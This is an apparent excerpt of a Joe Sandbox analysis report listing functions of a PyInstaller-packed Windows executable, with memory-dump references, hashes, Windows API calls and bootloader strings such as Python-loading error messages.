                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 485612231-0
                                                                                                                        • Opcode ID: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                                                                                        • Instruction ID: 10763bfa125849dc860613bcbb1649cf6331db0ee2cecedc50f5e6df619263f5
                                                                                                                        • Opcode Fuzzy Hash: d52a693ca64156346f3ce50e8e1564a69fccf06189b002bdd4e7495fde204544
                                                                                                                        • Instruction Fuzzy Hash: 69411972736A5482EF44DF6ADD6856AB3A1B74CFD0B8A9132DE0D87B64DE3CC4428300
                                                                                                                        Function 00007FF7A6746560 Relevance: .1, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                        • Instruction ID: 8c990dc1153174d5cd9d7ad1ebc72a1d2d2bb2f330f7f7eeb09d8c6503122090
                                                                                                                        • Opcode Fuzzy Hash: ee4673de95ce1c3203f19ce9ce644468e75f80e7845f38315ddde02822e300f2
                                                                                                                        • Instruction Fuzzy Hash: E831B33272AB4282E624EF25685953BE694ABC8F90F554238EA4D53BF6DF3CD0128614
                                                                                                                        Function 00007FF7A67589B0 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
                                                                                                                        • Instruction ID: 8cd4b6d1a3331b190d9d4e7312f86d35509cfc119dac6b5f6060c3f66d92c247
                                                                                                                        • Opcode Fuzzy Hash: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
                                                                                                                        • Instruction Fuzzy Hash: 70F068717292558BDB98DF69AC1262A77D0F70C7C0F809039D58D83B54D63C90618F14
                                                                                                                        Function 00007FF7A673B880 Relevance: .0, Instructions: 2COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                                                                                        • Instruction ID: 75b64ebb6fef2a509c8515815dd3082429aec207c685c795734e709ddfd06af8
                                                                                                                        • Opcode Fuzzy Hash: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                                                                                        • Instruction Fuzzy Hash: 01A0016192E806D0EA89AB10AC60072A670EB68B00B820071D40D820B49E2CA4409260
                                                                                                                        Function 00007FF7A6733DF0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                        • API String ID: 190572456-3109299426
                                                                                                                        • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction ID: 77535d7d8ab5dd0a0d08a7e4fe6ee07d86921f00ba6d953b9259fc05048862b6
                                                                                                                        • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                                                                                        • Instruction Fuzzy Hash: 9A429BA4E7FB4791E959FB04AC70176A361AF0CF90BD661B6C40D06278FF7CA9588321
                                                                                                                        Function 00007FF7A6732030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                        • String ID: P%
                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                        • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction ID: 1636f47dbf3c1c5f2d8388925eaf6a8df6364e8d7bd8d1c95ff75bba22e16fcd
                                                                                                                        • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction Fuzzy Hash: 3B510626625BA186D628AF36E4281BBF7A1F798B65F004131EBDE43694DF3CD045DB20
                                                                                                                        Function 00007FF7A6740228 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                        • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction ID: ff9f96565f9b3546b4d0f8c58f67b51de5f7abbdee0d93dab3afb5f225968293
                                                                                                                        • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction Fuzzy Hash: E3129761E2E14386FB207B14E96C67BF295FB84B50FC64035D6AA465E4DB3CE480CB61
                                                                                                                        Function 00007FF7A67312B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                        • Opcode ID: 5b3bfaf0e584e3743198573b378c70cc12b99bd6b2472864a1b1c3417ea56a7d
                                                                                                                        • Instruction ID: 95ccff422aa373bc9a6efebe031e0977909bc32b6b807d5d6fd22fbebca9119c
                                                                                                                        • Opcode Fuzzy Hash: 5b3bfaf0e584e3743198573b378c70cc12b99bd6b2472864a1b1c3417ea56a7d
                                                                                                                        • Instruction Fuzzy Hash: 71413361A2A64281EA18FB15AC606BBF3A0EF48F94FD64431DE4D47A65EE3CE5428710
                                                                                                                        Function 00007FF7A673DC30 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                        • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction ID: f4a996eb0d89d37e1a2fbfe26e1c8a56fa9758cf967bf85b2c08dd60d1eac86f
                                                                                                                        • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction Fuzzy Hash: 16E1B872A2974586EB24EF65D8503AEB7A0FB48F88F910136EE4D57B65CF38E490C710
                                                                                                                        Function 00007FF7A6737600 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A673769F
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A67376EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 626452242-27947307
                                                                                                                        • Opcode ID: d9d72b3d70819d691a45a5c69d72243a1061b564855b32675f65c1480a0ef4ee
                                                                                                                        • Instruction ID: c597434b1ee8b956e0f29e1b9fed7723dcc682038d6a2e2622a4dbf1fe6a9732
                                                                                                                        • Opcode Fuzzy Hash: d9d72b3d70819d691a45a5c69d72243a1061b564855b32675f65c1480a0ef4ee
                                                                                                                        • Instruction Fuzzy Hash: 02419232A2AB8281E625EF11BC5016BE7A5FB48B90F954135DA8D47BB8DF3CD051C710
                                                                                                                        Function 00007FF7A6737B40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6737B81
                                                                                                                          • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6737BF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 3723044601-27947307
                                                                                                                        • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction ID: 674c22706ca1dce763fe5f08bc495403be674943fa01283c7ea6178d188522d9
                                                                                                                        • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction Fuzzy Hash: 78219E21A2AB8285EA15AF11AC6117AF761EB88F80F894135CA4D437A8EF7CE451C310
                                                                                                                        Function 00007FF7A6749264 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$p$p
                                                                                                                        • API String ID: 3215553584-1995029353
                                                                                                                        • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction ID: 676d0d0e284ef535519467082b1eae824432383dba27a2ea66bd151e1c4d1048
                                                                                                                        • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction Fuzzy Hash: 8B12C561E2E14386FB24BB14D86C6BBF795EB88F50FC6C035D699066E4DB3CE4408B61
                                                                                                                        Function 00007FF7A6737C30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 626452242-876015163
                                                                                                                        • Opcode ID: 75ada23d093b76e5b35e8a216d6a7c66ee7d2317080e6440cd66e03fb4978861
                                                                                                                        • Instruction ID: fb5f7c4ba782a0e678da344aefe0b9742fad4e6c9e8f92383e494be50e4c23ef
                                                                                                                        • Opcode Fuzzy Hash: 75ada23d093b76e5b35e8a216d6a7c66ee7d2317080e6440cd66e03fb4978861
                                                                                                                        • Instruction Fuzzy Hash: D241C632A2AB4281E615EF15AC5017BA7A5FB48F90FA54135DA4D47BB8DF3CD011C714
                                                                                                                        Function 00007FF7A673CEE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CF6D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CF7B
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CFA5
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CFEB
                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7A673D19A,?,?,?,00007FF7A673CE8C,?,?,00000001,00007FF7A673CAA9), ref: 00007FF7A673CFF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                        • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
